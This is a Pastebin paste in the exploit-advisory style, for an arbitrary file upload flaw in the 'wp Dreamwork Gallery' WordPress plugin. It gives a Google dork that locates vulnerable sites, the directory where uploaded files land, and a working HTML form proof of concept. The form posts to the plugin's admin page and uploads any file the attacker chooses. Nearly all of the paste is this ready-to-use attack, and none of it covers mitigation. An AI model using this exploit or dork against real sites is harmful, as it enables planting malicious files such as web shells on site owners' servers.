Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _ _____ ___ _ _______ _______
- | \ | | ____/ _ \ | |/ / _ \ \ / / ____|
- | \| | _|| | | | | ' / | | \ V /| _|
- | |\ | |__| |_| | | . \ |_| || | | |___
- |_| \_|_____\___/ |_|\_\___/ |_| |_____|
- #########################################################
- # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery
- # Category: webapps
- # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
- ########################################################
- # Proof of Concept
- the uploaded file will be located in the directory
- Example : [(7)_uploadfolder]
- /wp-content/uploads/dreamwork/7_uploadfolder/big/
- <html>
- <body>
- <form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="drm_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
